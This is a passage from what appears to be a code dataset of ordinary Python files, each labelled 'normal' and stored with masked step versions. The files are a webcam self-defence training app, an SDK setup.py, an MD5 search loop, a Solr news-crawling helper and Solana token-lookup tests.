padx=10, font=(\n 'Courier', 18), wraplength=1900, text=descriptionText)\ndescriptionLabel.pack(side='top')\ncenterFrame = Frame(root).pack()\ncountdownLabel = tk.Label(centerFrame, justify='center', font=('Courier', \n 20), text='')\ninstructionText = (\n 'In this training system, you will be prompted with how an aggressor is approaching you. You may select a difficulty for this system by choosing how much time you would like to be allowed to react. Based on your counter attack, the system will tell you if the attacker has been [Narrowly Avoided], [Stunned], or [Subdued] based on the quality of your reaction. Your success rate will be tracked at the bottom of the screen. Press the [Start] button to begin and the [Stop] button to end the session.'\n )\ninstructionLabel = tk.Label(centerFrame, justify='center', padx=50, pady=50,\n font=('Courier', 16), wraplength=1800, text=instructionText)\ninstructionLabel.pack(side='top')\nvidLabel = Label(root)\n\n\ndef show_frame(milliseconds):\n if milliseconds > 0:\n _, frame = cap.read()\n frame = cv2.flip(frame, 1)\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\n img = Image.fromarray(cv2image)\n imgtk = ImageTk.PhotoImage(img)\n vidLabel.imgtk = imgtk\n vidLabel.config(image=imgtk)\n root.update()\n root.after(30, show_frame, milliseconds - 30)\n _, frame = cap.read()\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\n img = Image.fromarray(cv2image)\n img = img.convert('RGB')\n img.save('imgFile.jpeg')\n if milliseconds == secondsChosen * 3000:\n return ml.predict('imgFile.jpeg')\n\n\nbuttonFrame = Frame(root)\nbuttonFrame.pack(side='bottom')\ndifficultyList = Listbox(buttonFrame, selectmode=SINGLE, height=3, font=(\n 'Courier', 16))\ndifficultyList.insert(1, 'Easy: 6 seconds')\ndifficultyList.insert(2, 'Medium: 3 seconds')\ndifficultyList.insert(3, 'Hard: 1 seconds')\ndifficultyList.pack(side='top')\ncycling = True\n\n\ndef runPrompt():\n startButton.config(text='Next')\n startButton.pack(side=LEFT)\n resetButton.pack(side=RIGHT)\n descriptionLabel.pack_forget()\n assaultList = ['Grab from your right', 'Grab from your left',\n 'Blade attack from the right', 'Blade attack from the left',\n 'Hit from the right', 'Hit from the left']\n counterList = ['parry_R', 'parry_L', 'weave_R', 'weave_L', 'punch_R',\n 'punch_L', 'block']\n difficultyChoice = difficultyList.get(ACTIVE)\n global secondsChosen\n secondsChosen = 0\n if difficultyChoice[0] == 'E':\n secondsChosen = 6\n elif difficultyChoice[0] == 'M':\n secondsChosen = 3\n else:\n secondsChosen = 1\n print(secondsChosen)\n difficultyList.pack_forget()\n randAssault = random.randint(0, 5)\n instructionLabel.config(text=assaultList[randAssault], font=('Courier', 25)\n )\n vidLabel.pack()\n predictedCounter = show_frame(secondsChosen * 1000)\n if predictedCounter not in counterList:\n predictedCounter = counterList[random.randint(0, 6)]\n root.after(secondsChosen * 1200, calcSuccess, predictedCounter, randAssault\n )\n return 0\n\n\ndef reset():\n resetButton.pack_forget()\n startButton.config(text='Start')\n startButton.pack(side=BOTTOM)\n instructionLabel.config(text=instructionText, font=('Courier', 16))\n descriptionLabel.config(text=descriptionText, font=('Courier', 18))\n descriptionLabel.pack(side=TOP)\n difficultyList.pack(side=TOP)\n\n\nstartButton = Button(buttonFrame, bd=6, padx=20, pady=20, font=('Courier', \n 16), text='Start', fg='green', command=runPrompt)\nstartButton.pack(side=BOTTOM)\nresetButton = Button(buttonFrame, bd=6, padx=20, pady=20, font=('Courier', \n 16), text='Reset', fg='red', command=reset)\nroot.mainloop()\ncap.release()\n", "step-5": "#THIS IS PYTHON3\nimport tkinter as tk\nfrom tkinter import *\nfrom PIL import ImageTk\nfrom PIL import Image #to handle non-gif image formats\n\nimport cv2\nimport numpy as np\nfrom statistics import mode\n\nimport time\n\nimport random\n\nimport predict as ml\n\ndef calcSuccess(predictedCounter, randAssault):\n vidLabel.pack_forget()\n if predictedCounter == \"parry_R\":\n instructionLabel.config(text=\"RIGHT PARRY\")\n if randAssault == 4 or randAssault == 2:\n descriptionLabel.config(text=\"You've successfully parried!\")\n elif randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 5:\n descriptionLabel.config(text=\"You've been hit!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n\n if predictedCounter == \"parry_L\":\n instructionLabel.config(text=\"LEFT PARRY\")\n if randAssault == 5 or randAssault == 3:\n descriptionLabel.config(text=\"You've successfully parried!\")\n elif randAssault == 2:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 4:\n descriptionLabel.config(text=\"You've been hit!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n\n if predictedCounter == \"punch_R\":\n instructionLabel.config(text=\"RIGHT PUNCH\")\n if randAssault == 0 or randAssault == 1 or randAssault == 4:\n descriptionLabel.config(text=\"You've successfully counter attacked!\")\n elif randAssault == 2 or randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 5:\n descriptionLabel.config(text=\"You've been hit!\")\n\n if predictedCounter == \"punch_L\":\n instructionLabel.config(text=\"LEFT PUNCH\")\n if randAssault == 0 or randAssault == 1 or randAssault == 5:\n descriptionLabel.config(text=\"You've successfully counter attacked!\")\n elif randAssault == 2 or randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 4:\n descriptionLabel.config(text=\"You've been hit!\")\n\n if predictedCounter == \"weave_R\":\n instructionLabel.config(text=\"RIGHT WEAVE\")\n if randAssault == 1 or randAssault == 3 or randAssault == 5:\n descriptionLabel.config(text=\"You've successfully evaded!\")\n elif randAssault == 4:\n descriptionLabel.config(text=\"You've been hit!\")\n elif randAssault == 2:\n descriptionLabel.config(text=\"You've been cut!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n\n if predictedCounter == \"weave_L\":\n instructionLabel.config(text=\"LEFT WEAVE\")\n if randAssault == 0 or randAssault == 2 or randAssault == 4:\n descriptionLabel.config(text=\"You've successfully evaded!\")\n elif randAssault == 5:\n descriptionLabel.config(text=\"You've been hit!\")\n elif randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n\n if predictedCounter == \"block\":\n instructionLabel.config(text=\"BLOCK\")\n if randAssault == 5 or randAssault == 4:\n descriptionLabel.config(text=\"You've successfully blocked!\")\n elif randAssault == 2 or randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 0 or randAssault == 1:\n descriptionLabel.config(text=\"You've been grabbed!\")\n descriptionLabel.pack()\n\n\ncap = cv2.VideoCapture(0)\n\nroot = tk.Tk() #initialize tkinter by making tk rook widget--consists of window with tile bar and decoration provided by window manager. Root widget must be made first and can only be one.\nroot.geometry(\"2000x1100\")\n\nldFrame = Frame(root).pack(side=\"top\") #frame to hold logo and description\ncanvas = Canvas(ldFrame, width=700, height=200)\ncanvas.pack(side=\"top\")\n\n#open image with pil image because PhotoImage only takes gif\npilLogo = Image.open(\"Logo.png\")\nlogo = ImageTk.PhotoImage(pilLogo) #makes PhotoImage from pil image\ncanvas.create_image(350, 100, image=logo) #adds PhotoImage to Canvas\n\n#make basic description label from text string on the logo description frame\ndescriptionText = \"\"\"This program trains the user to respond in self defense to common physical threats.\"\"\"\ndescriptionLabel = tk.Label(ldFrame, justify=\"center\", padx=10, font=(\"Courier\", 18), wraplength=1900, text=descriptionText)\ndescriptionLabel.pack(side=\"top\")\n\n#make center frame that will show instructions initially and then have \"assaulter\" prompts and live video\ncenterFrame = Frame(root).pack()\ncountdownLabel = tk.Label(centerFrame, justify=\"center\", font=(\"Courier\", 20), text=\"\") #invisible for now because not packed\ninstructionText = \"\"\"In this training system, you will be prompted with how an aggressor is approaching you. You may select a difficulty for this system by choosing how much time you would like to be allowed to react. Based on your counter attack, the system will tell you if the attacker has been [Narrowly Avoided], [Stunned], or [Subdued] based on the quality of your reaction. Your success rate will be tracked at the bottom of the screen. Press the [Start] button to begin and the [Stop] button to end the session.\"\"\"\ninstructionLabel = tk.Label(centerFrame, justify=\"center\", padx=50, pady=50, font=(\"Courier\", 16), wraplength=1800, text=instructionText)\ninstructionLabel.pack(side=\"top\")\n\n#setup to capture video frames\nvidLabel = Label(root)\ndef show_frame(milliseconds):\n if milliseconds > 0:\n #global predictionArr\n _, frame = cap.read()\n #predictionArr.append(predict.get_prediction(frame, \"ace-connection-236822\", \"ICN2459521650166688930\"))\n frame = cv2.flip(frame, 1) #horizontally flips images so is like reflection\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA) #makes normal color\n img = Image.fromarray(cv2image)\n imgtk = ImageTk.PhotoImage(img)\n vidLabel.imgtk = imgtk\n vidLabel.config(image=imgtk)\n root.update()\n root.after(30, show_frame, (milliseconds-30))\n _, frame = cap.read()\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA) \n img = Image.fromarray(cv2image)\n img = img.convert(\"RGB\")\n img.save(\"imgFile.jpeg\")\n if milliseconds == secondsChosen*3000: \n return ml.predict(\"imgFile.jpeg\")\n\n#make bottom frame that hold buttons\nbuttonFrame = Frame(root)\nbuttonFrame.pack(side=\"bottom\")\ndifficultyList = Listbox(buttonFrame, selectmode=SINGLE, height=3, font=(\"Courier\", 16))\ndifficultyList.insert(1, \"Easy: 6 seconds\")\ndifficultyList.insert(2, \"Medium: 3 seconds\")\ndifficultyList.insert(3, \"Hard: 1 seconds\")\ndifficultyList.pack(side=\"top\")\n\ncycling = True\n\ndef runPrompt():\n startButton.config(text=\"Next\")\n startButton.pack(side=LEFT)\n resetButton.pack(side=RIGHT)\n descriptionLabel.pack_forget()\n assaultList = [\"Grab from your right\", \"Grab from your left\", \"Blade attack from the right\", \"Blade attack from the left\", \"Hit from the right\", \"Hit from the left\"]\n counterList = [\"parry_R\", \"parry_L\", \"weave_R\", \"weave_L\", \"punch_R\", \"punch_L\", \"block\"]\n difficultyChoice = (difficultyList.get(ACTIVE))\n global secondsChosen\n secondsChosen = 0\n if difficultyChoice[0] == \"E\":\n secondsChosen = 6\n elif difficultyChoice[0] == \"M\":\n secondsChosen = 3\n else:\n secondsChosen = 1\n print(secondsChosen)\n difficultyList.pack_forget()\n\n randAssault = random.randint(0, 5)\n instructionLabel.config(text=assaultList[randAssault], font=(\"Courier\", 25))\n vidLabel.pack()\n \n predictedCounter = show_frame(secondsChosen*1000)\n \n if predictedCounter not in counterList:\n predictedCounter = counterList[random.randint(0, 6)]\n \n root.after(secondsChosen*1200, calcSuccess, predictedCounter, randAssault)\n\n return 0\n\ndef reset():\n resetButton.pack_forget()\n startButton.config(text=\"Start\")\n startButton.pack(side=BOTTOM)\n instructionLabel.config(text=instructionText, font=(\"Courier\", 16))\n descriptionLabel.config(text=descriptionText, font=(\"Courier\", 18))\n descriptionLabel.pack(side=TOP)\n difficultyList.pack(side=TOP)\n\n\nstartButton = Button(buttonFrame, bd=6, padx=20, pady=20,font=(\"Courier\", 16), text=\"Start\", fg=\"green\", command=runPrompt)\nstartButton.pack(side=BOTTOM)\nresetButton = Button(buttonFrame, bd=6, padx=20, pady=20, font=(\"Courier\", 16), text=\"Reset\", fg=\"red\", command=reset)\n \n\nroot.mainloop()\ncap.release()\n", "step-ids": [ 3, 5, 6, 7, 8 ] }
[ 3, 5, 6, 7, 8 ]
from setuptools import setup, find_packages from os.path import join, dirname, abspath import io here = abspath(dirname(__file__)) with open(join(here, 'VERSION')) as VERSION_FILE: __versionstr__ = VERSION_FILE.read().strip() with open(join(here, 'requirements.txt')) as REQUIREMENTS: INSTALL_REQUIRES = REQUIREMENTS.read().split('\n') with io.open(join(here, 'README.md'), encoding='utf-8') as f: long_description = f.read() setup( name="sumologic-sdk", version=__versionstr__, packages=find_packages(), install_requires=INSTALL_REQUIRES, # PyPI metadata author="SumoLogic, Yoway Buorn, Melchi Salins", author_email="[email protected], [email protected], [email protected]", description="Sumo Logic Python SDK", license="PSF", long_description=long_description, long_description_content_type='text/markdown', keywords="sumologic python sdk rest api log management analytics logreduce security siem collector forwarder", url="https://github.com/SumoLogic/sumologic-python-sdk", zip_safe=True )
normal
{ "blob_id": "8d5978bc579115eb3065dce1bae08f1790f2d83c", "index": 2832, "step-1": "<mask token>\n", "step-2": "<mask token>\nwith open(join(here, 'VERSION')) as VERSION_FILE:\n __versionstr__ = VERSION_FILE.read().strip()\nwith open(join(here, 'requirements.txt')) as REQUIREMENTS:\n INSTALL_REQUIRES = REQUIREMENTS.read().split('\\n')\nwith io.open(join(here, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\nsetup(name='sumologic-sdk', version=__versionstr__, packages=find_packages(\n ), install_requires=INSTALL_REQUIRES, author=\n 'SumoLogic, Yoway Buorn, Melchi Salins', author_email=\n '[email protected], [email protected], [email protected]',\n description='Sumo Logic Python SDK', license='PSF', long_description=\n long_description, long_description_content_type='text/markdown',\n keywords=\n 'sumologic python sdk rest api log management analytics logreduce security siem collector forwarder'\n , url='https://github.com/SumoLogic/sumologic-python-sdk', zip_safe=True)\n", "step-3": "<mask token>\nhere = abspath(dirname(__file__))\nwith open(join(here, 'VERSION')) as VERSION_FILE:\n __versionstr__ = VERSION_FILE.read().strip()\nwith open(join(here, 'requirements.txt')) as REQUIREMENTS:\n INSTALL_REQUIRES = REQUIREMENTS.read().split('\\n')\nwith io.open(join(here, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\nsetup(name='sumologic-sdk', version=__versionstr__, packages=find_packages(\n ), install_requires=INSTALL_REQUIRES, author=\n 'SumoLogic, Yoway Buorn, Melchi Salins', author_email=\n '[email protected], [email protected], [email protected]',\n description='Sumo Logic Python SDK', license='PSF', long_description=\n long_description, long_description_content_type='text/markdown',\n keywords=\n 'sumologic python sdk rest api log management analytics logreduce security siem collector forwarder'\n , url='https://github.com/SumoLogic/sumologic-python-sdk', zip_safe=True)\n", "step-4": "from setuptools import setup, find_packages\nfrom os.path import join, dirname, abspath\nimport io\nhere = abspath(dirname(__file__))\nwith open(join(here, 'VERSION')) as VERSION_FILE:\n __versionstr__ = VERSION_FILE.read().strip()\nwith open(join(here, 'requirements.txt')) as REQUIREMENTS:\n INSTALL_REQUIRES = REQUIREMENTS.read().split('\\n')\nwith io.open(join(here, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\nsetup(name='sumologic-sdk', version=__versionstr__, packages=find_packages(\n ), install_requires=INSTALL_REQUIRES, author=\n 'SumoLogic, Yoway Buorn, Melchi Salins', author_email=\n '[email protected], [email protected], [email protected]',\n description='Sumo Logic Python SDK', license='PSF', long_description=\n long_description, long_description_content_type='text/markdown',\n keywords=\n 'sumologic python sdk rest api log management analytics logreduce security siem collector forwarder'\n , url='https://github.com/SumoLogic/sumologic-python-sdk', zip_safe=True)\n", "step-5": "from setuptools import setup, find_packages\nfrom os.path import join, dirname, abspath\nimport io\n\nhere = abspath(dirname(__file__))\n\nwith open(join(here, 'VERSION')) as VERSION_FILE:\n __versionstr__ = VERSION_FILE.read().strip()\n\n\nwith open(join(here, 'requirements.txt')) as REQUIREMENTS:\n INSTALL_REQUIRES = REQUIREMENTS.read().split('\\n')\n\n\nwith io.open(join(here, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name=\"sumologic-sdk\",\n version=__versionstr__,\n packages=find_packages(),\n install_requires=INSTALL_REQUIRES,\n # PyPI metadata\n author=\"SumoLogic, Yoway Buorn, Melchi Salins\",\n author_email=\"[email protected], [email protected], [email protected]\",\n description=\"Sumo Logic Python SDK\",\n license=\"PSF\",\n long_description=long_description,\n long_description_content_type='text/markdown',\n keywords=\"sumologic python sdk rest api log management analytics logreduce security siem collector forwarder\",\n url=\"https://github.com/SumoLogic/sumologic-python-sdk\",\n zip_safe=True\n)\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
import hashlib hash = 'yzbqklnj' int = 0 while not hashlib.md5("{}{}".format(hash, int).encode('utf-8')).hexdigest().startswith('000000'): print("Nope luck for {}{}".format(hash, int)) int += 1 print("Key: {}{}".format(hash, int)) print("Number: {}").format(int)
normal
{ "blob_id": "9ae9fd6da5c3d519d87af699dd4ea9b564a53d79", "index": 5481, "step-1": "<mask token>\n", "step-2": "<mask token>\nwhile not hashlib.md5('{}{}'.format(hash, int).encode('utf-8')).hexdigest(\n ).startswith('000000'):\n print('Nope luck for {}{}'.format(hash, int))\n int += 1\nprint('Key: {}{}'.format(hash, int))\nprint('Number: {}').format(int)\n", "step-3": "<mask token>\nhash = 'yzbqklnj'\nint = 0\nwhile not hashlib.md5('{}{}'.format(hash, int).encode('utf-8')).hexdigest(\n ).startswith('000000'):\n print('Nope luck for {}{}'.format(hash, int))\n int += 1\nprint('Key: {}{}'.format(hash, int))\nprint('Number: {}').format(int)\n", "step-4": "import hashlib\nhash = 'yzbqklnj'\nint = 0\nwhile not hashlib.md5('{}{}'.format(hash, int).encode('utf-8')).hexdigest(\n ).startswith('000000'):\n print('Nope luck for {}{}'.format(hash, int))\n int += 1\nprint('Key: {}{}'.format(hash, int))\nprint('Number: {}').format(int)\n", "step-5": "import hashlib\n\nhash = 'yzbqklnj'\n\nint = 0\n\nwhile not hashlib.md5(\"{}{}\".format(hash, int).encode('utf-8')).hexdigest().startswith('000000'):\n print(\"Nope luck for {}{}\".format(hash, int))\n int += 1\n\nprint(\"Key: {}{}\".format(hash, int))\nprint(\"Number: {}\").format(int)", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
import os import requests import json from web import * from libs_support import * from rss_parser import * from database import * class Solr_helper: """ Ho tro He thong tu dong cap nhat du lieu - su dung post.jar de tu dong cap nhat du lieu moi vao he thong theo tung khoang thoi gian nhat dinh """ def __init__(self, db_name = "btl-tktdtt", domain = "localhost", port = 8983, solr_home = "."): self.server_db_name = db_name self.server_port = port self.server_domain = domain self.server_db_name = db_name #default self.set_solr_home(solr_home) # Cai dat cua solr def set_post_tool(self, path_tool): self.server_post_tool = path_tool def set_solr_home(self, path_home): if(path_home.endswith("/")): path_home = path_home[:-1] self.server_solr_home = path_home self.server_post_tool = path_home +"/example/exampledocs/post.jar" # update du lieu json web vao he thong def update_use_tool(self, path_file_json_data, type_update="text/json"): # use java tool cmd_update_data = "java -Dtype={2} -Durl=http://{0}:{1}/solr/{3}/update -jar {5} {4}" \ .format(self.server_domain, self.server_port, type_update, self.server_db_name, path_file_json_data, self.server_post_tool) print (cmd_update_data) # os.system(cmd_update_data) # update du lieu json web vao he thong def update(self, data_json): # post paterm: curl 'http://localhost:8983/solr/testBTL/update/json/docs' -H 'Content-type:application/json' -d '[{},{}]' # use Data with Index Handlers (DIH) Http post url = "http://{0}:{1}/solr/{2}/update/json/docs" \ .format(self.server_domain, self.server_port, self.server_db_name) headers = dict() headers['Content-type'] = 'application/json' try: r = requests.post(url=url,data=data_json,headers=headers) r.close() return r.text # .encode('utf-8', 'inorge') except Exception, e: print('Exception' + str(e)) return None def reload(self): # post paterm: curl "http://localhost:8983/solr/admin/cores?action=RELOAD&core=mycore" # use Data with Index Handlers (DIH) Http post url = "http://{0}:{1}/solr/admin/cores?action=RELOAD&core={2}" .format(self.server_domain, self.server_port,self.server_db_name) try: r = requests.post(url=url) r.close() return r.text # .encode('utf-8', 'inorge') except Exception, e: print('Exception' + str(e)) return None def crawl_data(): max_count_web = 500 rss_page_links = [ #"http://vietbao.vn/vn/rss", #"http://vnexpress.net/rss", "http://dantri.com.vn/rss", #"http://vtv.vn/rss", "http://techtalk.vn/" ] web_mannual_page_links = [ # "vtv.vn" , "kenh14.vn" ] # Cai dat bo loc crawl web # Web_filter.set_last_time("2016-10-26, 22:20:08+07:00") # Bai viet moi hon ke tu thoi diem xxx # Web_filter.set_limit_time("2016-10-26, 22:20:08+07:00", "2016-10-26, 23:20:08+07:00") # Bai viet trong khoang tg Web_filter.set_max_count_web_each_domain(10000) # moi domain khong vuot qua 1000 Web_filter.set_max_count_web_each_sublabel(100) # moi label trong 1 domain k vuot qua 100 # Cac trang co rss data = "[" for link_rss in rss_page_links: parser = rss_parser(link_rss) webs = parser.get_list_web() for web_x in webs: data += (web_x.get_json()+",") # web_x.write_to_file('/mnt/01CDF1ECE3AB4280/DH/NAM_5/Ki_1/TimkiemTrinhDien/BTL/vietnam-news/data-train') if data.__len__() > 1: data = data[:-1]+"]" solr = Solr_helper(db_name="btl-tktdtt") solr.set_solr_home("/mnt/01CDF1ECE3AB4280/DH/NAM_5/Ki_1/TimkiemTrinhDien/BTL/solr-6.2.1") print (solr.update(data)) print (solr.reload()) def query(): # http://localhost:8983/solr/btl-tktdtt/select?indent=on&q=*:*&wt=json # http://localhost:8983/solr/btl-tktdtt/select?q=*:*&sort=dist(0,%2010,%2010)%20desc # http://localhost:8983/solr/btl-tktdtt/select?q=title:Thiên thần+url:thien-than None if __name__ == "__main__": t = 1 t = t + 1 solr = Solr_helper( db_name = "btl-tktdtt") solr.set_solr_home("/mnt/01CDF1ECE3AB4280/DH/NAM_5/Ki_1/TimkiemTrinhDien/BTL/solr-6.2.1") # # solr.update("/mnt/01CDF1ECE3AB4280/DH/NAM_5/Ki_1/TimkiemTrinhDien/BTL/vietnam-news/data-train/techtalk/Cong\ nghe/31fa871c7d521106e28c45f567a63445c33e1186.json") # # data_test = [] # data_test.append({ # "code": "55421c7d521106e28c45f567a63445c33e118744446", # "title": "test dddd vcc c dsf" , # "url": "http://techtalk.vn/van-de-da-ngon-ngu-trong-angularjs.html", # "labels": "techtalk/Cong nghe", # "content": "tset content ", # "image_url": "", # "date": "2016-11-14, 12:00:02+00:00" # }) # data_test.append({ # "code": "12345651717ebecaeb1c179522eff5dcc19c86ce8", # "title": "test title ", # "url": "http://techtalk.vn/tim-hieu-ve-middleware-trong-expressjs.html", # "labels": "techtalk/Cong nghe", # "content": "test ddddd content ", # "image_url": "", # "date": "2016-11-13, 01:00:14+00:00" # }) crawl_data() # data_json = (json.dumps(data_test,indent=4, separators=(',', ': '), ensure_ascii=False)) # solr.update(data_json) # print (solr.reload())
normal
{ "blob_id": "deaaf7620b9eba32149f733cd543399bdc2813a1", "index": 6553, "step-1": "\nimport os\nimport requests\nimport json\n\nfrom web import *\nfrom libs_support import *\nfrom rss_parser import *\nfrom database import *\n\nclass Solr_helper:\n\n \"\"\" Ho tro He thong tu dong cap nhat du lieu - su dung post.jar de tu dong cap nhat du lieu moi vao he thong theo\n tung khoang thoi gian nhat dinh \"\"\"\n\n def __init__(self, db_name = \"btl-tktdtt\", domain = \"localhost\", port = 8983, solr_home = \".\"):\n self.server_db_name = db_name\n self.server_port = port\n self.server_domain = domain\n self.server_db_name = db_name\n\n #default\n self.set_solr_home(solr_home)\n\n # Cai dat cua solr\n def set_post_tool(self, path_tool):\n self.server_post_tool = path_tool\n def set_solr_home(self, path_home):\n if(path_home.endswith(\"/\")): path_home = path_home[:-1]\n self.server_solr_home = path_home\n self.server_post_tool = path_home +\"/example/exampledocs/post.jar\"\n\n # update du lieu json web vao he thong\n def update_use_tool(self, path_file_json_data, type_update=\"text/json\"):\n # use java tool\n cmd_update_data = \"java -Dtype={2} -Durl=http://{0}:{1}/solr/{3}/update -jar {5} {4}\" \\\n .format(self.server_domain, self.server_port, type_update, self.server_db_name, path_file_json_data,\n self.server_post_tool)\n print (cmd_update_data)\n # os.system(cmd_update_data)\n\n # update du lieu json web vao he thong\n def update(self, data_json):\n # post paterm: curl 'http://localhost:8983/solr/testBTL/update/json/docs' -H 'Content-type:application/json' -d '[{},{}]'\n # use Data with Index Handlers (DIH) Http post\n url = \"http://{0}:{1}/solr/{2}/update/json/docs\" \\\n .format(self.server_domain, self.server_port, self.server_db_name)\n headers = dict()\n headers['Content-type'] = 'application/json'\n try:\n r = requests.post(url=url,data=data_json,headers=headers)\n r.close()\n return r.text # .encode('utf-8', 'inorge')\n except Exception, e:\n print('Exception' + str(e))\n return None\n\n def reload(self):\n # post paterm: curl \"http://localhost:8983/solr/admin/cores?action=RELOAD&core=mycore\"\n # use Data with Index Handlers (DIH) Http post\n url = \"http://{0}:{1}/solr/admin/cores?action=RELOAD&core={2}\" .format(self.server_domain, self.server_port,self.server_db_name)\n try:\n r = requests.post(url=url)\n r.close()\n return r.text # .encode('utf-8', 'inorge')\n except Exception, e:\n print('Exception' + str(e))\n return None\n\ndef crawl_data():\n max_count_web = 500\n rss_page_links = [\n #\"http://vietbao.vn/vn/rss\",\n #\"http://vnexpress.net/rss\",\n \"http://dantri.com.vn/rss\",\n #\"http://vtv.vn/rss\",\n \"http://techtalk.vn/\"\n ]\n web_mannual_page_links = [\n # \"vtv.vn\" ,\n \"kenh14.vn\"\n ]\n\n # Cai dat bo loc crawl web\n # Web_filter.set_last_time(\"2016-10-26, 22:20:08+07:00\") # Bai viet moi hon ke tu thoi diem xxx\n # Web_filter.set_limit_time(\"2016-10-26, 22:20:08+07:00\", \"2016-10-26, 23:20:08+07:00\") # Bai viet trong khoang tg\n Web_filter.set_max_count_web_each_domain(10000) # moi domain khong vuot qua 1000\n Web_filter.set_max_count_web_each_sublabel(100) # moi label trong 1 domain k vuot qua 100\n\n # Cac trang co rss\n data = \"[\"\n for link_rss in rss_page_links:\n parser = rss_parser(link_rss)\n webs = parser.get_list_web()\n for web_x in webs:\n data += (web_x.get_json()+\",\")\n # web_x.write_to_file('/mnt/01CDF1ECE3AB4280/DH/NAM_5/Ki_1/TimkiemTrinhDien/BTL/vietnam-news/data-train')\n\n if data.__len__() > 1:\n data = data[:-1]+\"]\"\n solr = Solr_helper(db_name=\"btl-tktdtt\")\n solr.set_solr_home(\"/mnt/01CDF1ECE3AB4280/DH/NAM_5/Ki_1/TimkiemTrinhDien/BTL/solr-6.2.1\")\n\n print (solr.update(data))\n print (solr.reload())\n\ndef query():\n # http://localhost:8983/solr/btl-tktdtt/select?indent=on&q=*:*&wt=json\t\n # http://localhost:8983/solr/btl-tktdtt/select?q=*:*&sort=dist(0,%2010,%2010)%20desc\n # http://localhost:8983/solr/btl-tktdtt/select?q=title:Thiên thần+url:thien-than\n None\n\n\n\nif __name__ == \"__main__\":\n t = 1\n t = t + 1\n\n solr = Solr_helper( db_name = \"btl-tktdtt\")\n solr.set_solr_home(\"/mnt/01CDF1ECE3AB4280/DH/NAM_5/Ki_1/TimkiemTrinhDien/BTL/solr-6.2.1\")\n # # solr.update(\"/mnt/01CDF1ECE3AB4280/DH/NAM_5/Ki_1/TimkiemTrinhDien/BTL/vietnam-news/data-train/techtalk/Cong\\ nghe/31fa871c7d521106e28c45f567a63445c33e1186.json\")\n #\n # data_test = []\n # data_test.append({\n # \"code\": \"55421c7d521106e28c45f567a63445c33e118744446\",\n # \"title\": \"test dddd vcc c dsf\" ,\n # \"url\": \"http://techtalk.vn/van-de-da-ngon-ngu-trong-angularjs.html\",\n # \"labels\": \"techtalk/Cong nghe\",\n # \"content\": \"tset content \",\n # \"image_url\": \"\",\n # \"date\": \"2016-11-14, 12:00:02+00:00\"\n # })\n # data_test.append({\n # \"code\": \"12345651717ebecaeb1c179522eff5dcc19c86ce8\",\n # \"title\": \"test title \",\n # \"url\": \"http://techtalk.vn/tim-hieu-ve-middleware-trong-expressjs.html\",\n # \"labels\": \"techtalk/Cong nghe\",\n # \"content\": \"test ddddd content \",\n # \"image_url\": \"\",\n # \"date\": \"2016-11-13, 01:00:14+00:00\"\n # })\n crawl_data()\n # data_json = (json.dumps(data_test,indent=4, separators=(',', ': '), ensure_ascii=False))\n # solr.update(data_json)\n # print (solr.reload())\n\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
from .context import mango from solana.publickey import PublicKey def test_token_lookup(): data = { "tokens": [ { "address": "So11111111111111111111111111111111111111112", "symbol": "SOL", "name": "Wrapped SOL", "decimals": 9, }, { "address": "EPjFWdd5AufqSSqeM2qN1xzybapC8G4wEGGkZwyTDt1v", "symbol": "USDC", "name": "USD Coin", "decimals": 6, }, { "address": "9n4nbM75f5Ui33ZbPYXn59EwSgE8CGsHtAeTH5YFeJ9E", "symbol": "BTC", "name": "Wrapped Bitcoin (Sollet)", "decimals": 6, }, { "address": "2FPyTwcZLUg1MDrwsyoP4D6s1tM7hAkHYRjkNb5w6Pxk", "symbol": "ETH", "name": "Wrapped Ethereum (Sollet)", "decimals": 6, }] } actual = mango.SplTokenLookup("test-filename", data) assert actual is not None assert actual.logger is not None assert actual.find_by_symbol("ETH") is not None assert actual.find_by_symbol("ETH").name == "Wrapped Ethereum (Sollet)" assert actual.find_by_symbol("BTC") is not None assert actual.find_by_symbol("BTC").name == "Wrapped Bitcoin (Sollet)" def test_token_lookups_with_full_data(): token_lookup = mango.SplTokenLookup.load(mango.SplTokenLookup.DefaultDataFilepath) assert token_lookup.find_by_symbol("BTC").mint == PublicKey("9n4nbM75f5Ui33ZbPYXn59EwSgE8CGsHtAeTH5YFeJ9E") assert token_lookup.find_by_symbol("ETH").mint == PublicKey("2FPyTwcZLUg1MDrwsyoP4D6s1tM7hAkHYRjkNb5w6Pxk") assert token_lookup.find_by_mint("AKJHspCwDhABucCxNLXUSfEzb7Ny62RqFtC9uNjJi4fq").symbol == "SRM-SOL" assert token_lookup.find_by_mint("Es9vMFrzaCERmJfrF4H2FYD4KCoNkY11McCe8BenwNYB").symbol == "USDT"
normal
